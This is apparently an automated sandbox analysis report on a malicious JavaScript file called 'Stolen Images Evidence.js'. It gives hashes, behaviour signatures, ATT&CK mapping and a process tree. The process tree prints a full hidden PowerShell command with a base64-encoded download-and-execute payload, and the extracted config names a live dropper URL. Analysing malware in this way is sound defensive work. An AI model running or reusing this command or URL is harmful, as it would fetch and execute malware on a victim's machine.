Overview

overview

10

Static

static

Stolen Ima...nce.js

windows7_x64

10

Stolen Ima...nce.js

windows10_x64

10

Analysis

  • max time kernel
    13s
  • max time network
    67s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-07-2021 19:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Stolen Images Evidence.js

  • Size

    23KB

  • MD5

    86c4c4a86388ab87b8166563fc6080b9

  • SHA1

    a22941692d34245363e1ed75a2e55f9e439f3e2d

  • SHA256

    6961814b2c02d34f6eb8da26d59c3e555763f28680ed67bd7c6b30994dba74d3

  • SHA512

    9005d46de018ce0409a2a8f0bd7afe611636c88e5f503b4d0e22ef72dbec7b0240a3f1c12b6711a07dc839d04225df5f3fcee4db8c68edf4eb8a58a7aef71ebc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://munardis.space/222g100/index.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3948
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3948 -s 2296
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2840

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2360-114-0x0000000000000000-mapping.dmp
    Download
  • memory/3948-115-0x0000000000000000-mapping.dmp
    Download
  • memory/3948-121-0x000002791BB70000-0x000002791BB71000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3948-124-0x0000027919B60000-0x0000027919B62000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3948-125-0x0000027919B63000-0x0000027919B65000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3948-130-0x000002791BD20000-0x000002791BD21000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3948-135-0x0000027919B66000-0x0000027919B68000-memory.dmp
    Filesize

    8KB

    Download